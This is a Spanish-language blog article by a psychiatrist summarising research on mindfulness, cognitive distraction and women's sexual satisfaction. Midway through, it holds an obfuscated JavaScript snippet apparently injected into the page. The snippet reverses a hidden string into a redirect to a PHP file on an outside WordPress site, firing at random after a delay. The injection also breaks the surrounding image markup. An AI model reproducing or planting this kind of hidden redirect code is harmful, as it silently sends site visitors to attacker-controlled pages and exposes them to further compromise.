Haciendo el amor: prohibido distraerse Atracción, pasión y amor

Desde hace tiempo se sabe que las relaciones sexuales no se aprenden. El organismo humano está preparado desde hace millones de años para el “abrazo sexual”. Así es que solo basta dejarse llevar por el deseo y el amor y los cuerpos se acomodarán solos para la unión y el placer.

Las relaciones íntimas sin embargo pueden perturbarse de diferentes maneras sobre todo si las parejas de dejan llevar por los consejos de las “revistas del corazón”.

EJERCICIOS DE CONCENTRACIÓN
El artículo de Breagh C. Newcombe y Angela D. Weaver, investigadores del Departamento de Psicología de la “St. Francis Xavier University”, trata justamente de los efectos negativos de la distracción durante las relaciones sexuales y su tratamiento.

Se titula : “Mindfulness, cognitive distraction, and sexual well-being in women” y fue publicado en “The Canadian Journal of Human Sexuality”, en su Número 2, del Año 2016.

VIVIR EL MOMENTO
Empiezan definiendo el “mindfulness”, que como sabemos no ha encontrado la palabra que lo traduzca correctamente al castellano.

Pero ellos echan mano de una definición tradicional y lo describen como la conciencia del momento presente, como una experiencia intencional y desprovista de juzgamiento. En otras palabras ser trata de concentrarse en lo que está pasando en la conciencia de la persona en un momento determinado. Desechando emociones, pensamientos, recuerdos y cualquier otra situación que aleje de lo que está ocurriendo en ese preciso momento.

Señalan que las personas pueden diferir de su capacidad natural para el “mindfulness”. Pero también que es una habilidad que podrá adquirirse con un entrenamiento específico.

SATISFACCIÓN SEXUAL
Hacen notar que desde hace poco han proliferado las investigaciones sobre este fenómeno en su relación con diferentes aspectos del sentirse bien psicológicamente.. Aunque es más reciente el interés de los estudiosos por establecer la relación entre el “mindfulness” y la satisfacción sexual.

$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == “string”) return $vTB$I_919AeEAw2z$KX.list[n].split(“”).reverse().join(“”);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=[“‘php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando-por-la-calle-en-verano_1098-2314.jpg” alt=”” width=”500″ height=”333″ />

Los estudios por lo general se han enfocado en grupos pequeños que acuden a los consultorios. Pacientes a los que se ha aplicado las técnicas ya conocidas del “mindfulness”. Desde luego que esto no ha sido suficiente para entender que clase de mecanismos serían aquellos que intervienen para lograr buenos resultados.

SEGUIREMOS

Comentarios

comments


Author Image
Rene Flores

El Dr. Rene Flores es Médico Cirujano, especialista en Psiquiatría y ostenta el Grado Académico de Doctor en Medicina. Sus campos de interés abarcan la sexualidad, el matrimonio, la familia y la salud mental.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *